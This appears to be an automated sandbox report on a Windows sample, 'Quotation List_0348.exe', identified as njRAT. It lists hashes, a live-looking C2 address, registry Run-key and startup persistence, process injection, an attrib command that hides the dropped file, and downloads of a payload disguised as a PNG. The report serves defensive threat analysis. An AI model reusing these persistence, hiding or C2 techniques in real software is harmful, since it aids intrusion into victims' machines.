Analysis
max time kernel: 150s
max time network: 99s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 04/11/2022, 17:34 UTC
Static task: static1
Behavioral task: behavioral1
  Sample: Quotation List_0348.exe
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: Quotation List_0348.exe
  Resource: win10v2004-20220812-en
General
Target: Quotation List_0348.exe
Size: 6KB
MD5: 53e70bf3a2964e9c086d8ea3ac0daddf
SHA1: 82c8534e7cf0cf7d899d5871d0da82ba9c875f3b
SHA256: 246e869353e3d90c8aef21611cdfa29f32eaf84c07382ceaa0b251818213c541
SHA512: 74c3f2d7f4ad771690dba6ee0e6964aeb77aaed77bfc5d4e3ad3dc0104076a2085383272697247ec3191cafae87af437333f024323160f0af6714bf0663ead6b
SSDEEP: 96:XVuqNek+1LnGPL5RT2SzLAEy/tnp347KVYzNt:wH1Lqh2SzLAEUNR4g6
Malware Config
Extracted
Family: njrat
Version: v2.0
Botnet: update
C2: money2022.ddns.net:8080
Mutex: Windows
Attributes:
  reg_key: Windows
  splitter: |-F-|
Signatures

Executes dropped EXE (1 IoC)
  pid: 1344; Process: update.exe

Drops startup file (1 IoC)
  description: File created; ioc: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk; Process: Quotation List_0348.exe

Loads dropped DLL (1 IoC)
  pid: 976; Process: Quotation List_0348.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
  description: Set value (str); ioc: \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nkeqx = "\"C:\\Users\\Admin\\AppData\\Roaming\\Fckiqk\\Nkeqx.exe\""; Process: Quotation List_0348.exe
  description: Set value (str); ioc: \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\update.exe"; Process: Quotation List_0348.exe

Suspicious use of SetThreadContext (1 IoC)
  description: PID 1972 set thread context of 976; pid: 1972; Process: Quotation List_0348.exe; procid_target: 30

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid: 988; Process: powershell.exe
  pid: 1972; Process: Quotation List_0348.exe
  pid: 1672; Process: powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description: Token: SeDebugPrivilege; pid: 1972; Process: Quotation List_0348.exe
  description: Token: SeDebugPrivilege; pid: 988; Process: powershell.exe
  description: Token: SeDebugPrivilege; pid: 1344; Process: update.exe
  description: Token: SeDebugPrivilege; pid: 1672; Process: powershell.exe

Suspicious use of WriteProcessMemory (32 IoCs; identical rows grouped, count in brackets)
  description: PID 1972 wrote to memory of 988; pid: 1972; Process: Quotation List_0348.exe; procid_target: 27 [4]
  description: PID 1972 wrote to memory of 1404; pid: 1972; Process: Quotation List_0348.exe; procid_target: 29 [4]
  description: PID 1972 wrote to memory of 976; pid: 1972; Process: Quotation List_0348.exe; procid_target: 30 [9]
  description: PID 976 wrote to memory of 1344; pid: 976; Process: Quotation List_0348.exe; procid_target: 31 [7]
  description: PID 976 wrote to memory of 364; pid: 976; Process: Quotation List_0348.exe; procid_target: 32 [4]
  description: PID 1344 wrote to memory of 1672; pid: 1344; Process: update.exe; procid_target: 34 [4]

Views/modifies file attributes (1 TTP, 1 IoC)
  pid: 364; Process: attrib.exe
Processes (process tree; nesting shows parent/child, the number in brackets is the tree depth as given in the report)

[1] C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"
    PID: 1972
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==
        (the -enc argument is UTF-16LE base64 and decodes to: Start-Sleep -Seconds 56)
        PID: 988
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [2] C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"
        PID: 1404

    [2] C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"
        PID: 976
        - Drops startup file
        - Loads dropped DLL
        - Adds Run key to start application
        - Suspicious use of WriteProcessMemory

        [3] C:\Users\Admin\AppData\Roaming\update.exe
            Command line: "C:\Users\Admin\AppData\Roaming\update.exe"
            PID: 1344
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==
                (same encoded argument as above; decodes to: Start-Sleep -Seconds 56)
                PID: 1672
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\SysWOW64\attrib.exe
            Command line: attrib +h +r +s "C:\Users\Admin\AppData\Roaming\update.exe"
            PID: 364
            - Views/modifies file attributes
Network

Flow 1
Remote address: 194.180.48.203:80
Request:
GET /Bgfjlzp.png HTTP/1.1
Host: 194.180.48.203
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
Last-Modified: Thu, 03 Nov 2022 12:30:42 GMT
ETag: "20ac00-5ec90202b35a1"
Accept-Ranges: bytes
Content-Length: 2141184
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png

Flow 2
Remote address: 194.180.48.203:80
Request:
GET /Bgfjlzp.png HTTP/1.1
Host: 194.180.48.203
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
Last-Modified: Thu, 03 Nov 2022 12:30:42 GMT
ETag: "20ac00-5ec90202b35a1"
Accept-Ranges: bytes
Content-Length: 2141184
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png

Flow summary (values as listed in the report)
Flow 1: 37.4kB 2.2MB 809 1579
  HTTP Request: GET http://194.180.48.203/Bgfjlzp.png
  HTTP Response: 200
Flow 2: 36.7kB 2.2MB 796 1577
  HTTP Request: GET http://194.180.48.203/Bgfjlzp.png
  HTTP Response: 200
MITRE ATT&CK Enterprise v6
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB
MD5: 33b6647aac585dac651de8a32f421d31
SHA1: 0b7b6ebbcf2557b8b1aecdf286b6bcea26074f60
SHA256: 85870715e640843a3249fde91c2054ddeb384fdc4a4fc9c6ec42826800188c73
SHA512: 5a7d61e88a6587b73ae145bb49b252d01bc9f82858b97cff3e258d7701d94e843ac98542b24b8ea889b260eaf7695449bac86f9826f8265396b4cf60d4a4b232

(path not given in the report; listed three times with identical values, matching the hashes of the submitted sample)
Filesize: 6KB
MD5: 53e70bf3a2964e9c086d8ea3ac0daddf
SHA1: 82c8534e7cf0cf7d899d5871d0da82ba9c875f3b
SHA256: 246e869353e3d90c8aef21611cdfa29f32eaf84c07382ceaa0b251818213c541
SHA512: 74c3f2d7f4ad771690dba6ee0e6964aeb77aaed77bfc5d4e3ad3dc0104076a2085383272697247ec3191cafae87af437333f024323160f0af6714bf0663ead6b